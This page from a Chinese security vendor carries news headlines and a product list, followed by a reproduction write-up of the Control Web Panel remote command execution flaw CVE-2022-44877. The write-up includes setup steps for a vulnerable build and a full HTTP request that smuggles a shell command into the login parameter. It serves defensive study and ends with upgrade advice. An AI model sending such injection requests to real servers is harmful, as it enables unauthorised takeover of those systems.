金融机构数据安全能力体系建设与落地实践
2026-02-27
开工大吉|策马扬鞭,跃启新程!
2026-02-25
浙江省委宣传部副部长、省委网信办主任赵磊:守正创新 辩证施策 全力推动网络生态治理工作迈上新台阶
2026-02-10
美创产品全面入围中直机关2025年网络设备框架协议采购项目
2026-02-04
连续5年!美创再获中国网络安全产业联盟“先进会员单位”表彰
2026-01-21
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API审计 API防控 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务漏洞简介
Control Web Panel(CWP)是一个人工智能驱动的免费、专业Linux 服务器控制面板,常用于管理专用服务器和 VPS 等。在Control Web Panel 远程命令执行漏洞(CVE-2022-44877)中,攻击者可以在未授权的情况下构造特定请求触发远程命令执行,从而获取服务器的控制权限。
Centos Web Panel 7 - < 0.9.8.1147
本文复现该漏洞所使用的系统为centos 7系统
执行cd /usr/local/src命令进入到/usr/local/src目录
执行wget http://centos-webpanel.com/cwp-el7-latest,拉取安装脚本
目前官方安装脚本中默认安装的是最新的0.9.8.1149版本,该版本中已经对漏洞进行了修复
所以在拉取安装脚本后,需要将安装脚本中1149的相应位置修改为低于1147的版本才能进行漏洞复现,本文修改为1146
运行sh cwp-el7-latest命令,安装脚本会自动安装Control Web Panel
安装成功后会显示MySQL超级用户密码、CWP登录URL等信息
此时访问https://ip:2031/,输入服务器的账号密码即可登录进入控制台
可以看到当前的CWP版本为0.9.8.1146
目前国外安全研究员已经在github上公开了该漏洞的poc
链接为https://github.com/numanturle/CVE-2022-44877
首先退出登录
输入任意不正确的账号密码,使用burpsuite抓包
修改数据包如下,注:username必须为root,否则无法成功执行命令
POST /login/index.php?login=$(touch${IFS}/tmp/rceTest) HTTP/1.1Host: ip:2031User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 42Origin: https://ip:2031Connection: closeReferer: https://ip:2031/login/index.php?login=userloginCookie: cwpsrv-f53115a3f1840c3e155cf2187555f873=g3l0o4o056qmrbevd2o8ccdo6rUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=root&password=admin&commit=Login
可以看到成功在/tmp下创建了名为rceTest的文件
将Centos Web Panel 7升级到0.9.8.1147以上或最新版本